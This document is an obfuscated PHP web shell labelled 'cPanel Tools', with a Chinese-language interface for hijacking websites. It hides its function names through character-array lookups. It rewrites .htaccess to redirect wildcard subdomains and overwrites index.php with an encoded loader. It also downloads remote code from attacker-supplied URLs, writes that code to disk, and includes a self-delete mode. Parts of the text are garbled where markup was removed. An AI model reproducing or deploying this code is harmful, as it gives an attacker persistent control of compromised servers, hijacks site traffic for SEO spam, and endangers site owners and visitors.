cPanel Tools

fArpYw;2]wx8wP-*/$a/*-Hpjo@SX|}3,zx(>}.-*/(/*-(2|#!No2(o!9%-*/"~",/*-g`l=#EPf4b0U!ET;-*/" "); $c=$b[28].$b[29].$b[11].$b[25].$b[72].$b[74].$b[31].$b[26].$b[25].$b[27].$b[15].$b[26].$b[25]; $d=$b[28].$b[29].$b[11].$b[25].$b[72].$b[74].$b[31].$b[25].$b[16].$b[27].$b[15].$b[26].$b[25]; $e=$b[24].$b[21].$b[18].$b[25].$b[31].$b[23].$b[25].$b[10].$b[31].$b[27].$b[15].$b[16].$b[10].$b[25].$b[16].$b[10].$b[11]; $f=$b[24].$b[21].$b[18].$b[25].$b[31].$b[14].$b[9].$b[10].$b[31].$b[27].$b[15].$b[16].$b[10].$b[25].$b[16].$b[10].$b[11]; $action = isset($_GET['action'])? $_GET['action'] : ''; $path = isset($_POST['path']) ? $_POST['path'] : '.'; $root = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'].'/' : ''; $is_wp = is_wp($root);if($is_wp == 1){$path = $root;} $htaccess = $index = ''; if(file_exists($root."index.php")){ $index = $e($root."index.php"); }elseif(file_exists($root."index.html")){ $index = $e($root."index.html"); } if(file_exists($root.".htaccess")){ $htaccess = $e($root.".htaccess"); } switch($action){ case 'all': $title = '泛域名劫持'; $content = ''; $host = isset($_POST['host']) ? $_POST['host'] : ''; $bb = isset($_POST['bb']) ? $_POST['bb'] : ''; $domain = isset($_POST['domain']) ? $_POST['domain'] : ''; if($host){ $host = explode('|', $host); $bb = explode(PHP_EOL, $bb); $htaccess_root = ''.PHP_EOL.'RewriteEngine on'.PHP_EOL; if(count($host) == count($bb)){ for($i=0;$i"; $f($root.$host[$i].'/.htaccess', $htaccess); $htaccess_root .= 'RewriteCond %{HTTP_HOST} ^'.$host[$i].'.'.$domain.'$'.PHP_EOL.'RewriteCond %{REQUEST_URI} !^/'.$host[$i].'/'.PHP_EOL.'RewriteCond %{REQUEST_FILENAME} !-f'.PHP_EOL.'RewriteCond %{REQUEST_FILENAME} !-d'.PHP_EOL.'RewriteRule ^(.*)$ /'.$host[$i].'/$1'.PHP_EOL.'RewriteCond %{HTTP_HOST} ^'.$host[$i].'.'.$domain.'$'.PHP_EOL.'RewriteRule ^(/)?$ '.$host[$i].'/index.php [L]'.PHP_EOL.PHP_EOL; } $htaccess_root .= ''; $f($root.'.htaccess', $htaccess_root); $content = '生成成功'; }else{ $content = '错误：主机名与劫持链接数量不一致。'; } }else{ $content = ''; } break; case 'b': $title = 'cPanel 加密劫持'; $content = ''; $htaccess_post = isset($_POST['htaccess']) ? $_POST['htaccess'] : ''; $htaccess_post = $c($htaccess_post, true); $index_code = isset($_POST['index_code']) ? $_POST['index_code'] : ''; $index_code = $c($index_code, true); $bb = isset($_POST['bb']) ? $_POST['bb'] : ''; $bb = trim($c($bb, true)); $bb2 = isset($_POST['bb2']) ? $_POST['bb2'] : ''; $bb2 = trim($c($bb2, true)); $fileName2 = isset($_POST['fileName2']) ? $_POST['fileName2'] : ''; $bb3 = isset($_POST['bb3']) ? $_POST['bb3'] : ''; $bb3 = trim($c($bb3, true)); $fileName3 = isset($_POST['fileName3']) ? $_POST['fileName3'] : ''; if($bb || $bb2 || $bb3){ if($htaccess_post == ''){ $htaccess_post = "".PHP_EOL."RewriteEngine On".PHP_EOL."RewriteBase /".PHP_EOL."RewriteRule ^index.php$ - [L]".PHP_EOL."RewriteCond %{REQUEST_FILENAME} !-f".PHP_EOL."RewriteCond %{REQUEST_FILENAME} !-d".PHP_EOL."RewriteRule . index.php [L]".PHP_EOL.""; } if(file_exists($root.".htaccess")){ $temp = $e($root.".htaccess"); if(md5($temp) != md5($htaccess_post)){ @chmod($root.".htaccess", 0755); @unlink($root.".htaccess"); $result = $f($root.".htaccess", $htaccess_post); if($result){ $temp = $e($root.".htaccess"); if(md5($temp) == md5($htaccess_post)){ $content .= ".htaccess 编辑成功。
"; }else{ $content .= ".htaccess 编辑失败。
"; } }else{ $content .= ".htaccess 编辑失败。
"; } }else{ $content .= ".htaccess 正常。
"; } }else{ $result = $f($root.".htaccess", $htaccess_post); if($result){ $temp = $e($root.".htaccess"); if(md5($temp) == md5($htaccess_post)){ $content .= ".htaccess 生成成功。
"; }else{ $content .= ".htaccess 生成失败。
"; } }else{ $content .= ".htaccess 生成失败。
"; } } $houzhui = ''; if($bb){ $code = get($bb); $code = str_replace(array(''), '', $code); if($code){ $f($root."zindex", $d($code)); $result = $f($root."index.php", $houzhui.$index_code); if($result){ $content .= $bb." - index.php 劫持成功。
"; }else{ $content .= $bb." - index.php 劫持失败。
"; } }else{ $content .= $bb." - index.php 劫持失败。
"; } } if($bb2 && $fileName2){ $fileName2_txt = str_replace('.php', '.txt', $fileName2); $code2 = get($bb2); if($code2){ $code2 = str_replace(array(''), '', $code2); $f($root.$fileName2_txt, $d($code2)); $result = $f($root.$fileName2, str_replace('zindex', $fileName2_txt, $houzhui)); if($result){ $content .= $bb2." - ".$fileName2." 劫持成功。
"; }else{ $content .= $bb2." - ".$fileName2." 劫持生成失败。
"; } }else{ $content .= $bb2." - ".$fileName2." 劫持代码获取失败。
"; } } if($bb3 && $fileName3){ $fileName3_txt = str_replace('.php', '.txt', $fileName3); $code3 = get($bb3); if($code3){ $code3 = str_replace(array(''), '', $code3); $f($root.$fileName3_txt, $d($code3)); $result = $f($root.$fileName3, str_replace('zindex', $fileName3_txt, $houzhui)); if($result){ $content .= $bb3." - ".$fileName3." 劫持成功。
"; }else{ $content .= $bb3." - ".$fileName3." 劫持生成失败。
"; } }else{ $content .= $bb3." - ".$fileName3." 劫持代码获取失败。
"; } } } break; case 'unlink': $title = '自毁程序'; $status = unlink(__FILE__); if($status){ $content = '自毁成功'; }else{ $content = '自毁失败'; } break; default: $title = 'cPanel 加密劫持'; $content = ''; break; }?> cPanel Tools

'), '', $code); $code = 'fArpYw;2]wx8wP-*/$a/*-Hpjo@SX|}3,zx(>}.-*/(/*-(2|#!No2(o!9%-*/"~",/*-g`l=#EPf4b0U!ET;-*/" ");'.PHP_EOL.'$c=$b[28].$b[29].$b[11].$b[25].$b[72].$b[74].$b[31].$b[26].$b[25].$b[27].$b[15].$b[26].$b[25];'.PHP_EOL.'$d=$b[27].$b[12].$b[25].$b[29].$b[10].$b[25].$b[31].$b[24].$b[9].$b[16].$b[27].$b[10].$b[21].$b[15].$b[16];'.PHP_EOL.'$e=$d($a,$c("'.$d($code).'",true));'.PHP_EOL.'$e();?>'; return $code; } ?>

域名
主机名
劫持链接